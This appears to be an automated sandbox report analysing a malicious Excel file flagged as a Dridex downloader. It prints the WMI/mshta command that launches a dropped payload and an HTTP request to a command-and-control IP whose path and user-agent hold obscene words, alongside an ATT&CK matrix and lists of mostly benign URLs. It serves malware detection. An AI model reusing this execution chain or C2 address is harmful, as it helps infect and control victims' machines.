      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/workPowerBIGetDatasetsApihttps://api.pow
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/workhttps://login.windows.net/common/oau
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/worko
      Source: D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://staging.cortana.ai
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://staging.cortana.aiBearer
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://staging.cortana.aihttps://login.windows.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmpString found in binary or memory: https://staging.cortana.airla
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://store.office.cn/addinstemplate
      Source: global traffic; HTTP traffic detected: GET /6tfcnfucknugget4gpenis3dade5z6cpc HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Language: en-US
        User-Agent: rape
        Host: 149.129.254.152:8080

      E-Banking Fraud:

      Yara detected Dridex Downloader
      Source: Yara match; File source: C:\ProgramData\tCeltZ.rtf, type: DROPPED

      System Summary:

      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
      Source: Screenshot number: 4; Screenshot OCR: Enable Editing" and "Enable Content" to display. 0 3 Data peraeaeoeeaoei: paIUO uaiee aanoaiue o
      Source: Screenshot number: 4; Screenshot OCR: Enable Content" to display. 0 3 Data peraeaeoeeaoei: paIUO uaiee aanoaiue oIue'luujiod notr Serv
      Source: Screenshot number: 8; Screenshot OCR: Enable Editing" and "Enable Content" to display. 3 Data paIUO uaiee aanoaiue oIue'luujiod notr S
      Source: Screenshot number: 8; Screenshot OCR: Enable Content" to display. 3 Data paIUO uaiee aanoaiue oIue'luujiod notr Service issue 4 zIe 1
      Found Excel 4.0 Macro with suspicious formulas
      Source: order 4544471372.xls; Initial sample: EXEC
      Found protected and hidden Excel 4.0 Macro sheet
      Source: order 4544471372.xls; Initial sample: Sheet name: Macro1
      Contains functionality to create processes via WMI
      Source: EXCEL.EXE, 00000000.00000002.542772455.00000000117E0000.00000004.00000001.sdmp; Binary or memory string: C:\Users\user\Documents\C:\Windows\SysWOW64\Wbem\wmic.exewmic process call create "mshta C:\ProgramData\tCeltZ.rtf"C:\Windows\System32\Wbem\wmic.exeWinSta0\Default=::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=computerComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\computerNUMBER_OF_PROCESSORS=4OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 7, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=5507ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\TempUSERDOMAIN=RAYHIWGUSERDOMAIN_ROAMINGPROFILE=computerUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowsx
      Found obfuscated Excel 4.0 Macro
      Source: order 4544471372.xls; Macro extractor: Sheet: Macro1 high usage of CHAR() function: 26
      Source: order 4544471372.xls; Macro extractor: Sheet name: Macro1
      Source: C:\Windows\System32\mshta.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Code function: 0_3_130234FB
      Source: order 4544471372.xls; ReversingLabs: Detection: 13%
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
      Source: unknown; Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\tCeltZ.rtf"
      Source: C:\Windows\SysWOW64\wbem\WMIC.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknown; Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
      Source: C:\Windows\System32\wbem\WmiPrvSE.exe; Process created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\tCeltZ.rtf
      Source: C:\Windows\SysWOW64\wbem\WMIC.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
      Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5324:120:WilError_01
      Source: C:\Windows\SysWOW64\wbem\WMIC.exe; WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; File created: C:\Users\user~1\AppData\Local\Temp\{BFEB2554-F1FC-4B55-8EC7-29D40F128D11} - OProcSessId.dat
      Source: classification engine; Classification label: mal100.troj.expl.evad.winXLS@7/8@0/1
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; File read: C:\Users\desktop.ini
      Source: C:\Windows\System32\mshta.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
      Source: Window Recorder; Window detected: More than 3 window changes detected
      Source: order 4544471372.xls; Initial sample: OLE zip file path = xl/media/image1.png
      Source: order 4544471372.xls; Initial sample: OLE zip file path = docProps/custom.xml
      Source: FFC20000.0.dr; Initial sample: OLE zip file path = xl/media/image1.png
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; File opened: C:\Windows\SysWOW64\MSVCR100.dll

      Persistence and Installation Behavior:

      Creates processes via WMI
      Source: C:\Windows\SysWOW64\wbem\WMIC.exe; WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create

      Hooking and other Techniques for Hiding and Protection:

      Creates and opens a fake document (probably a fake document to hide exploiting)
      Source: C:\Windows\System32\wbem\WmiPrvSE.exe; Process created: cmd line: tceltz.rtf
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Process created: cmd line: tceltz.rtf
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\conhost.exe; Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wbem\WmiPrvSE.exe; Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exe; Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exe TID: 5464; Thread sleep time: -30000s >= -30000s
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Code function: 0_3_0F53FA58 sldt word ptr [eax]
      Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Code function: 0_3_0F542E4C rdtsc
      Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.411702761.000000000F59E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.349574960.000000000F536000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.411656756.000000000F537000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.414628702.000000000F59E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.349641759.000000000F59E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.542025374.000000000F59E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.414512357.000000000F537000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.541923673.000000000F537000.00000004.00000001.sdmp, mshta.exe, 0000001A.00000003.469056454.000002170B64B000.00000004.00000001.sdmp, mshta.exe, 0000001A.00000003.469008575.0000020F08951000.00000004.00000001.sdmp, mshta.exe, 0000001A.00000002.538705158.000002170B64E000.00000004.00000001.sdmp, mshta.exe, 0000001A.00000002.534821002.0000020F08952000.00000004.00000020.sdmp, mshta.exe, 0000001A.00000003.469215918.000002170B653000.00000004.00000001.sdmp; Binary or memory string: Hyper-V RAW
      Source: EXCEL.EXE, 00000000.00000002.539215911.000000000D793000.00000004.00000001.sdmp; Binary or memory string: Hyper-V RAWH
      Source: C:\Windows\System32\wbem\WmiPrvSE.exe; Process created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\tCeltZ.rtf
      Source: Yara match; File source: app.xml, type: SAMPLE
      Source: EXCEL.EXE, 00000000.00000002.536920215.0000000002DA0000.00000002.00020000.sdmp, mshta.exe, 0000001A.00000002.535628470.0000020F08D70000.00000002.00020000.sdmp; Binary or memory string: uProgram Manager
      Source: EXCEL.EXE, 00000000.00000002.536920215.0000000002DA0000.00000002.00020000.sdmp, mshta.exe, 0000001A.00000002.535628470.0000020F08D70000.00000002.00020000.sdmp; Binary or memory string: Shell_TrayWnd
      Source: EXCEL.EXE, 00000000.00000002.536920215.0000000002DA0000.00000002.00020000.sdmp, mshta.exe, 0000001A.00000002.535628470.0000020F08D70000.00000002.00020000.sdmp; Binary or memory string: Progman
      Source: EXCEL.EXE, 00000000.00000002.536920215.0000000002DA0000.00000002.00020000.sdmp, mshta.exe, 0000001A.00000002.535628470.0000020F08D70000.00000002.00020000.sdmp; Binary or memory string: Progmanlock

      Mitre Att&ck Matrix

      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
      Valid Accounts | Windows Management Instrumentation 21 | Path Interception | Process Injection 2 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 11 | Remote Services | Email Collection 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
      Default Accounts | Scripting 3 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 11 | LSASS Memory | Virtualization/Sandbox Evasion 2 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Non-Standard Port 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
      Domain Accounts | Exploitation for Client Execution 22 | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 2 | Security Account Manager | Process Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 2 | NTDS | File and Directory Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol 1 | SIM Card Swap | | Carrier Billing Fraud
      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting 3 | LSA Secrets | System Information Discovery 4 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol 1 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      Source | Detection | Scanner | Label | Link
      order 4544471372.xls | 13% | ReversingLabs | Document-Excel.Trojan.Heuristic |

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs


      Domains and IPs

      Contacted Domains

      No contacted domains info

      Contacted URLs

      Name | Malicious | Antivirus Detection | Reputation
      http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpc | false | Avira URL Cloud: safe | unknown

      URLs from Memory and Binaries

                                                                                            https://login.windows.net/common/oauth2/authorize/fEXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpfalse
                                                                                              high
                                                                                              https://substrate.office.comaEXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://149.129.254.ingsb6mshta.exe, 0000001A.00000002.534688222.0000020F08921000.00000004.00000020.sdmp, mshta.exe, 0000001A.00000003.469184261.0000020F08921000.00000004.00000001.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonEXCEL.EXE, 00000000.00000003.459410247.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350232384.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397001902.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263009518.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460721096.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383781939.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263429090.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544023705.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463256033.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
                                                                                                high
                                                                                                https://ncus.contentsync.EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                https://augloop.office.comLinkRequestApiPageTitleRetrievalhttps://uci.EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://substrate.office.comgEXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/EXCEL.EXE, 00000000.00000003.459410247.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350232384.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397001902.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263009518.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460721096.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383781939.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263429090.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544023705.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463256033.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
                                                                                                  high
                                                                                                  http://weather.service.msn.com/data.aspxEXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
                                                                                                    high
                                                                                                    https://login.windows.net/common/oauth2/authorizePVEXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      https://outlook.office365.com/autodiscover/autodiscover.jsonYEXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        https://substrate.office.comPEXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://149.129.254.152:8080/6tfcnfucknugget4gpenis3damshta.exe, 0000001A.00000003.469104734.0000020F088BC000.00000004.00000001.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosEXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
                                                                                                          high
                                                                                                          https://substrate.office.comSEXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlEXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
                                                                                                            high
                                                                                                            https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2AzurEXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmpfalse
                                                                                                              high
                                                                                                              https://devnull.onenote.comMBI_SSL_SHORTEXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              low
                                                                                                              https://substrate.office.comWEXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://analysis.windows.net/powerbi/apiBEXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                https://api.microsoftstream.com/api/StreamVideoBasehttps://web.microsoftstream.com/video/PPTQuickStaEXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  https://login.windows.net/common/oauth2/authorizeaEXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://149.129.254.152:8080/6tfcmshta.exe, 0000001A.00000003.469151527.0000020F088F8000.00000004.00000001.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://api.addins.omex.office.net/appstate/queryFgpEXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonPEXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        https://wus2.contentsync.EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://onedrive.live.comedEXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dadVmshta.exe, 0000001A.00000003.469104734.0000020F088BC000.00000004.00000001.sdmp, mshta.exe, 0000001A.00000002.534411624.0000020F088B5000.00000004.00000020.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
